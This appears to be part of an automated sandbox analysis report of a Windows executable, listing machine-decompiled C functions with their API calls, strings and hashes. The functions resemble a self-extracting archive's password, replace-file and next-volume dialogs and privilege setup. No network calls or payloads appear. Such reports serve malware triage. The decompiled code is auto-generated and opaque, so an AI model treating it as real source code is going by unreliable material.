                • Instruction Fuzzy Hash: 6231AFB1A0021EBFDB26DF95DD819AEBBBCEF85310F514066F6049B210DBB08E448B61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E003F31D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr* _v16;
                				signed int _v20;
                				char _v24;
                				intOrPtr _v28;
                				signed int _v36;
                				void* _v40;
                				intOrPtr _v44;
                				signed int _v48;
                				intOrPtr _v56;
                				void _v60;
                				signed char* _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t74;
                				void* _t75;
                				char _t76;
                				signed int _t78;
                				signed int _t80;
                				signed char* _t81;
                				signed int _t82;
                				signed int _t83;
                				intOrPtr* _t87;
                				void* _t90;
                				signed char* _t93;
                				intOrPtr* _t96;
                				signed char _t97;
                				signed int _t98;
                				signed int _t99;
                				intOrPtr* _t101;
                				signed int _t102;
                				signed int _t103;
                				signed char _t108;
                				signed char* _t111;
                				signed int _t112;
                				void* _t113;
                				signed char* _t116;
                				void* _t121;
                				signed int _t123;
                				void* _t130;
                				void* _t131;
                
                				_t110 = __edx;
                				_t100 = __ecx;
                				_t96 = _a4;
                				_t132 =  *_t96 - 0x80000003;
                				if( *_t96 == 0x80000003) {
                					return _t74;
                				} else {
                					_push(_t121);
                					_push(_t113);
                					_t75 = E003F2AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
                					_t133 =  *((intOrPtr*)(_t75 + 8));
                					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                						__imp__EncodePointer(0);
                						_t121 = _t75;
                						if( *((intOrPtr*)(E003F2AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                							_t87 = E003F0961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                							_t130 = _t130 + 0x1c;
                							if(_t87 != 0) {
                								L16:
                								return _t87;
                							}
                						}
                					}
                					_t76 = _a20;
                					_v24 = _t76;
                					_v20 = 0;
                					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                						_push(_a28);
                						E003F0894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                						_t112 = _v36;
                						_t131 = _t130 + 0x18;
                						_t87 = _v40;
                						_v16 = _t87;
                						_v8 = _t112;
                						if(_t112 < _v28) {
                							_t102 = _t112 * 0x14;
                							_v12 = _t102;
                							do {
                								_t103 = 5;
                								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                								_t131 = _t131 + 0xc;
                								if(_v60 <= _t90 && _t90 <= _v56) {
                									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                									_t108 = _t93[4];
                									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                										if(( *_t93 & 0x00000040) == 0) {
                											_push(0);
                											_push(1);
                											E003F2DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                											_t112 = _v8;
                											_t131 = _t131 + 0x30;
                										}
                									}
                								}
                								_t112 = _t112 + 1;
                								_t87 = _v16;
                								_t102 = _v12 + 0x14;
                								_v8 = _t112;
                								_v12 = _t102;
                							} while (_t112 < _v28);
                						}
                						goto L16;
                					}
                					E003F8D24(_t96, _t110, 0, _t121);
                					asm("int3");
                					_t111 = _v68;
                					_push(_t96);
                					_push(_t121);
                					_push(0);
                					_t78 = _t111[4];
                					__eflags = _t78;
                					if(_t78 == 0) {
                						L41:
                						_t80 = 1;
                						__eflags = 1;
                					} else {
                						_t101 = _t78 + 8;
                						__eflags =  *_t101;
                						if( *_t101 == 0) {
                							goto L41;
                						} else {
                							__eflags =  *_t111 & 0x00000080;
                							_t116 = _a4;
                							if(( *_t111 & 0x00000080) == 0) {
                								L23:
                								_t97 = _t116[4];
                								_t123 = 0;
                								__eflags = _t78 - _t97;
                								if(_t78 == _t97) {
                									L33:
                									__eflags =  *_t116 & 0x00000002;
                									if(( *_t116 & 0x00000002) == 0) {
                										L35:
                										_t81 = _a8;
                										__eflags =  *_t81 & 0x00000001;
                										if(( *_t81 & 0x00000001) == 0) {
                											L37:
                											__eflags =  *_t81 & 0x00000002;
                											if(( *_t81 & 0x00000002) == 0) {
                												L39:
                												_t123 = 1;
                												__eflags = 1;
                											} else {
                												__eflags =  *_t111 & 0x00000002;
                												if(( *_t111 & 0x00000002) != 0) {
                													goto L39;
                												}
                											}
                										} else {
                											__eflags =  *_t111 & 0x00000001;
                											if(( *_t111 & 0x00000001) != 0) {
                												goto L37;
                											}
                										}
                									} else {
                										__eflags =  *_t111 & 0x00000008;
                										if(( *_t111 & 0x00000008) != 0) {
                											goto L35;
                										}
                									}
                									_t80 = _t123;
                								} else {
                									_t59 = _t97 + 8; // 0x6e
                									_t82 = _t59;
                									while(1) {
                										_t98 =  *_t101;
                										__eflags = _t98 -  *_t82;
                										if(_t98 !=  *_t82) {
                											break;
                										}
                										__eflags = _t98;
                										if(_t98 == 0) {
                											L29:
                											_t83 = _t123;
                										} else {
                											_t99 =  *((intOrPtr*)(_t101 + 1));
                											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
                											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                												break;
                											} else {
                												_t101 = _t101 + 2;
                												_t82 = _t82 + 2;
                												__eflags = _t99;
                												if(_t99 != 0) {
                													continue;
                												} else {
                													goto L29;
                												}
                											}
                										}
                										L31:
                										__eflags = _t83;
                										if(_t83 == 0) {
                											goto L33;
                										} else {
                											_t80 = 0;
                										}
                										goto L42;
                									}
                									asm("sbb eax, eax");
                									_t83 = _t82 | 0x00000001;
                									__eflags = _t83;
                									goto L31;
                								}
                							} else {
                								__eflags =  *_t116 & 0x00000010;
                								if(( *_t116 & 0x00000010) != 0) {
                									goto L41;
                								} else {
                									goto L23;
                								}
                							}
                						}
                					}
                					L42:
                					return _t80;
                				}
                			}


                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003F31FB
                • _abort.LIBCMT ref: 003F3306
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: EncodePointer_abort
                • String ID: MOC$RCC
                • API String ID: 948111806-2084237596
                • Opcode ID: 71f7523133429b998188f5189a76004337f8b3ab80847f2925b759ec8250391e
                • Instruction ID: 420e016a22b3b1e1ea5a9a6cefef137344db878fd9b457560593ffb57070bb75
                • Opcode Fuzzy Hash: 71f7523133429b998188f5189a76004337f8b3ab80847f2925b759ec8250391e
                • Instruction Fuzzy Hash: 59413A7190020DAFCF16DF98CD81AEEBBB5FF48304F158559FA046B262D735AA90DB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E003D7401(void* __ebx, void* __edi, void* __esi) {
                				intOrPtr _t31;
                				long _t38;
                				void* _t45;
                				void* _t48;
                				intOrPtr _t49;
                				void* _t62;
                				void* _t63;
                				void* _t66;
                
                				_t62 = __esi;
                				_t48 = __ebx;
                				E003EEB78(0x4027b7, _t66);
                				E003EEC50(0x1060);
                				 *((intOrPtr*)(_t66 - 0x20)) = 0;
                				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
                				 *((intOrPtr*)(_t66 - 0x18)) = 0;
                				 *((intOrPtr*)(_t66 - 0x14)) = 0;
                				 *((char*)(_t66 - 0x10)) = 0;
                				_t59 =  *((intOrPtr*)(_t66 + 8));
                				_push(0);
                				_push(0);
                				 *((intOrPtr*)(_t66 - 4)) = 0;
                				_push(_t66 - 0x20);
                				if(E003D3BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
                					if( *0x411022 == 0) {
                						if(E003D7A9C(L"SeSecurityPrivilege") != 0) {
                							 *0x411021 = 1;
                						}
                						E003D7A9C(L"SeRestorePrivilege");
                						 *0x411022 = 1;
                					}
                					_push(_t62);
                					_t63 = 7;
                					if( *0x411021 != 0) {
                						_t63 = 0xf;
                					}
                					_push(_t48);
                					_t49 =  *((intOrPtr*)(_t66 - 0x20));
                					_push(_t49);
                					_push(_t63);
                					_push( *((intOrPtr*)(_t66 + 0xc)));
                					if( *0x433000() == 0) {
                						if(E003DBB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
                							L10:
                							E003D2021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
                							_t38 = GetLastError();
                							E003D6DCB(0x411098, _t75);
                							if(_t38 == 5 && E003E07BC() == 0) {
                								E003D15C6(_t66 - 0x6c, 0x18);
                								E003E15FE(_t66 - 0x6c);
                							}
                							E003D6D83(0x411098, 1);
                						} else {
                							_t45 =  *0x433000(_t66 - 0x106c, _t63, _t49);
                							_t75 = _t45;
                							if(_t45 == 0) {
                								goto L10;
                							}
                						}
                					}
                				}
                				_t31 =  *((intOrPtr*)(_t66 - 0x20));
                				 *((intOrPtr*)(_t66 - 4)) = 2;
                				if(_t31 != 0) {
                					if( *((char*)(_t66 - 0x10)) != 0) {
                						E003DF445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
                						_t31 =  *((intOrPtr*)(_t66 - 0x20));
                					}
                					_t31 = L003F3E2E(_t31);
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
                				return _t31;
                			}


                APIs
                • __EH_prolog.LIBCMT ref: 003D7406
                  • Part of subcall function 003D3BBA: __EH_prolog.LIBCMT ref: 003D3BBF
                • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 003D74CD
                  • Part of subcall function 003D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 003D7AAB
                  • Part of subcall function 003D7A9C: GetLastError.KERNEL32 ref: 003D7AF1
                  • Part of subcall function 003D7A9C: CloseHandle.KERNEL32(?), ref: 003D7B00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: c1a6132770167c0e43c8f55deeef839efc6171b99027408a7c06cfda6e1f335e
                • Instruction ID: 3de9f10190e12bc1f2b1234b913d30931929460df559a6a4dc1775856f05106a
                • Opcode Fuzzy Hash: c1a6132770167c0e43c8f55deeef839efc6171b99027408a7c06cfda6e1f335e
                • Instruction Fuzzy Hash: 8331A172D04258AADF13EFA4AC45BEE7FB9AF49304F054027F505AB392D7748A44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDC.USER32(00000000), ref: 003EAAD2
                • GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,003EA829,?,?,?), ref: 003EAB01
                • ReleaseDC.USER32(00000000,?), ref: 003EAB99
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ObjectRelease
                • String ID: 7>
                • API String ID: 1429681911-87537302
                • Opcode ID: 64c7591404909433cc3fed3b0265753d6090345990b3de4bed4465a23d560d41
                • Instruction ID: 1589ddcc085ef9e6d8411e18204c3ccddfc61454665cbf6678c842427fc49549
                • Opcode Fuzzy Hash: 64c7591404909433cc3fed3b0265753d6090345990b3de4bed4465a23d560d41
                • Instruction Fuzzy Hash: B3214572108304AFE3059FA5DC48E6FBFF9FB89352F001829FA4692224D7359A548B66
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E003EAD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
                				void* _t12;
                				void* _t16;
                				intOrPtr _t19;
                				void* _t22;
                				WCHAR** _t24;
                				intOrPtr _t27;
                				void* _t28;
                				struct HWND__* _t30;
                				signed short _t31;
                
                				_t24 = _a16;
                				_t31 = _a12;
                				_t30 = _a4;
                				_t27 = _a8;
                				if(E003D1316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
                					L14:
                					__eflags = 1;
                					return 1;
                				}
                				_t28 = _t27 - 0x110;
                				if(_t28 == 0) {
                					_push( *_t24);
                					 *0x431cb8 = _t24;
                					L13:
                					SetDlgItemTextW(_t30, 0x66, ??);
                					goto L14;
                				}
                				if(_t28 != 1) {
                					L6:
                					return 0;
                				}
                				_t12 = (_t31 & 0x0000ffff) - 1;
                				if(_t12 == 0) {
                					GetDlgItemTextW(_t30, 0x66,  *( *0x431cb8), ( *0x431cb8)[1]);
                					_push(1);
                					L10:
                					EndDialog(_t30, ??);
                					goto L14;
                				}
                				_t16 = _t12 - 1;
                				if(_t16 == 0) {
                					_push(0);
                					goto L10;
                				}
                				if(_t16 == 0x65) {
                					_t19 = E003DC29A(__eflags,  *( *0x431cb8));
                					_t22 = E003D1100(_t30, E003DE617(0x8e),  *( *0x431cb8), _t19, 0);
                					__eflags = _t22;
                					if(_t22 == 0) {
                						goto L14;
                					}
                					_push( *( *0x431cb8));
                					goto L13;
                				}
                				goto L6;
                			}


                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003EAD98
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 003EADAD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 003EADC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 410059cb4b0c1d6333b91d451c8efba5eb490c02639929c087426c09e47faf97
                • Instruction ID: a762e954cb97ba3b994ea91090d0e4b926b375fafdfdee4b013645e027045129
                • Opcode Fuzzy Hash: 410059cb4b0c1d6333b91d451c8efba5eb490c02639929c087426c09e47faf97
                • Instruction Fuzzy Hash: 6E11E632240660BFD7139F69EC15F6B7BA9EF4A702F110221F240DB5F0C761B915972A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E003EDDA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                				void* _v4100;
                				void* __ebx;
                				int _t19;
                				void* _t21;
                				signed int _t24;
                				void* _t26;
                				void* _t28;
                				signed int _t31;
                				signed int _t33;
                				signed int _t35;
                				struct HWND__* _t46;
                				void* _t50;
                
                				E003EEC50(0x1000);
                				if( *0x41c572 == 0) {
                					_t46 =  *0x418458; // 0x303f2
                					if(_a4 == 2) {
                						_t24 =  *0x4330a8(_t46);
                						asm("sbb eax, eax");
                						_t46 = _t46 &  ~_t24;
                					}
                					E003DBAAD(_a8, _a12,  &_v4100, 0x800);
                					_t19 = DialogBoxParamW( *0x41102c, L"GETPASSWORD1", _t46, E003EB270,  &_v4100);
                					_t28 = _a16;
                					if(_t19 == 0) {
                						E003DF3FA(_t28, _t28, 0x4035f4);
                						 *0x418454 = 1;
                						_t21 = 0;
                					} else {
                						_t33 = 0x40;
                						memcpy(_t28, 0x427a78, _t33 << 2);
                						_t50 = _t50 + 0xc;
                						_t21 = 1;
                						asm("movsw");
                					}
                					if( *((char*)(_t28 + 0x100)) != 0) {
                						_t31 = 0x40;
                						_t21 = memcpy(0x41c472, _t28, _t31 << 2);
                						asm("movsw");
                					}
                					return _t21;
                				}
                				_t35 = 0x40;
                				_t26 = memcpy(_a16, 0x41c472, _t35 << 2);
                				asm("movsw");
                				return _t26;
                			}

                APIs
                • DialogBoxParamW.USER32(GETPASSWORD1,000303F2,003EB270,?,?), ref: 003EDE18
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DialogParam
                • String ID: GETPASSWORD1$r>$xzB
                • API String ID: 665744214-857704663
                • Opcode ID: a35172ee69b153133439a5de320e4fb67fc9e0f2de461f38831d25f5f46ad115
                • Instruction ID: 311c26750cbab8926688a0f6391a6439795e5da6b4fea6a6201ccb2c973ec19d
                • Opcode Fuzzy Hash: a35172ee69b153133439a5de320e4fb67fc9e0f2de461f38831d25f5f46ad115
                • Instruction Fuzzy Hash: D61138326442A4AADB139E35AC45BEF3798AB49351F158135FD45AF1C0CBB4AC84C768
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E003DD8EC(void* __ebx, void* __ecx, void* __edx) {
                				void* __esi;
                				void* _t22;
                				intOrPtr _t26;
                				signed int* _t30;
                				void* _t33;
                				void* _t41;
                				void* _t43;
                				void* _t45;
                				void* _t47;
                				void* _t49;
                				void* _t50;
                
                				_t43 = __edx;
                				_t42 = __ecx;
                				_t41 = __ebx;
                				_t47 = _t49 - 0x64;
                				_t50 = _t49 - 0xac;
                				_t45 = __ecx;
                				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
                					L12:
                					_t22 = 0;
                				} else {
                					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
                					 *((char*)(_t47 + 8)) = 0;
                					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
                					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
                						E003E1DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
                					}
                					_t26 =  *((intOrPtr*)(_t47 + 0x70));
                					if(_t26 == 0) {
                						E003E05A7(_t47 + 8, "s", 0x50);
                					} else {
                						_t33 = _t26 - 1;
                						if(_t33 == 0) {
                							_push(_t47 - 0x48);
                							_push("$%s");
                							goto L8;
                						} else {
                							if(_t33 == 1) {
                								_push(_t47 - 0x48);
                								_push("@%s");
                								L8:
                								_push(0x50);
                								_push(_t47 + 8);
                								E003DE5B1();
                								_t50 = _t50 + 0x10;
                							}
                						}
                					}
                					_t30 = E003F6159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E003DD710);
                					if(_t30 == 0) {
                						goto L12;
                					} else {
                						_t20 = 0x40e278 +  *_t30 * 0xc; // 0x404788
                						E003F67C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
                						_t22 = 1;
                					}
                				}
                				return _t22;
                			}

                APIs
                • __fprintf_l.LIBCMT ref: 003DD954
                • _strncpy.LIBCMT ref: 003DD99A
                  • Part of subcall function 003E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00411030,?,003DD928,00000000,?,00000050,00411030), ref: 003E1DC4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharMultiWide__fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 562999700-834177443
                • Opcode ID: 7698b8cf7b398832109ed501997463f3786d3bcae8cf59351320b329fc5950ad
                • Instruction ID: 11e491d615030d1d67b1d75b53eee7fabb34fa436df3f46a24e6e769bfadbdaf
                • Opcode Fuzzy Hash: 7698b8cf7b398832109ed501997463f3786d3bcae8cf59351320b329fc5950ad
                • Instruction Fuzzy Hash: 1E21A53354024CAEDB22EEA4DC05FEE7BACAF05300F140523F910A6292E372D658CF51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E003E0E46(long* __ecx, long _a4) {
                				void* __esi;
                				void* __ebp;
                				long _t11;
                				void* _t14;
                				long _t23;
                				long* _t25;
                
                				_t19 = __ecx;
                				_t11 = _a4;
                				_t25 = __ecx;
                				_t23 = 0x40;
                				 *__ecx = _t11;
                				if(_t11 <= _t23) {
                					if(_t11 == 0) {
                						 *__ecx = 1;
                						_t11 = 1;
                					}
                				} else {
                					 *__ecx = _t23;
                					_t11 = _t23;
                				}
                				_t25[0x41] = 0;
                				if(_t11 > _t23) {
                					 *_t25 = _t23;
                				}
                				_t3 =  &(_t25[0xc8]); // 0x320
                				_t25[0xc5] = 0;
                				InitializeCriticalSection(_t3);
                				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
                				_t14 = CreateEventW(0, 1, 1, 0);
                				_t25[0xc7] = _t14;
                				if(_t25[0xc6] == 0 || _t14 == 0) {
                					_push(L"\nThread pool initialization failed.");
                					_push(0x411098);
                					E003D6C31(E003D6C36(_t19), 0x411098, _t25, 2);
                				}
                				_t25[0xc3] = 0;
                				_t25[0xc4] = 0;
                				_t25[0x42] = 0;
                				return _t25;
                			}

                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,003DAC5A,00000008,?,00000000,?,003DD22D,?,00000000), ref: 003E0E85
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,003DAC5A,00000008,?,00000000,?,003DD22D,?,00000000), ref: 003E0E8F
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,003DAC5A,00000008,?,00000000,?,003DD22D,?,00000000), ref: 003E0E9F
                Strings
                • Thread pool initialization failed., xrefs: 003E0EB7
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: bc2a4999a0484f45728951f96f48546c9f9b381e96218e0e3240cb8d05cb0317
                • Instruction ID: 50887e96cb6886158f3c8710d4073d7886757354b973d9f266616b6cfe611a15
                • Opcode Fuzzy Hash: bc2a4999a0484f45728951f96f48546c9f9b381e96218e0e3240cb8d05cb0317
                • Instruction Fuzzy Hash: A011C4B16007089FC3264F76AC849ABFBDCEBA4740F10483EF1DAC3240D6B159808B54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Malloc
                • String ID: (>$2>$A
                • API String ID: 2696272793-2333864759
                • Opcode ID: 98715fac15b3cd596ff9d9da56871cbfd97980803ccc72d1e6361fb9a0b0e0b8
                • Instruction ID: b83e8acf907742c6e983a29c93c8b1265a1e16165940e637b8c38ce21397d960
                • Opcode Fuzzy Hash: 98715fac15b3cd596ff9d9da56871cbfd97980803ccc72d1e6361fb9a0b0e0b8
                • Instruction Fuzzy Hash: A4011B71901219ABCB15CFA4E9489DEBBF8AF09300B10416AE905E7310D7359A40CF94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EDCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                				WCHAR* _t15;
                				_Unknown_base(*)()* _t19;
                				int _t22;
                
                				 *0x42ec88 = _a12;
                				 *0x42ec8c = _a16;
                				 *0x418464 = _a20;
                				if( *0x418460 == 0) {
                					if( *0x418457 == 0) {
                						_t19 = E003EC220;
                						_t15 = L"REPLACEFILEDLG";
                						while(1) {
                							_t22 = DialogBoxParamW( *0x41102c, _t15,  *0x418458, _t19, _a4);
                							if(_t22 != 4) {
                								break;
                							}
                							if(DialogBoxParamW( *0x411028, L"RENAMEDLG",  *0x418450, E003ED600, _a4) != 0) {
                								break;
                							}
                						}
                						return _t22;
                					}
                					return 1;
                				}
                				return 0;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
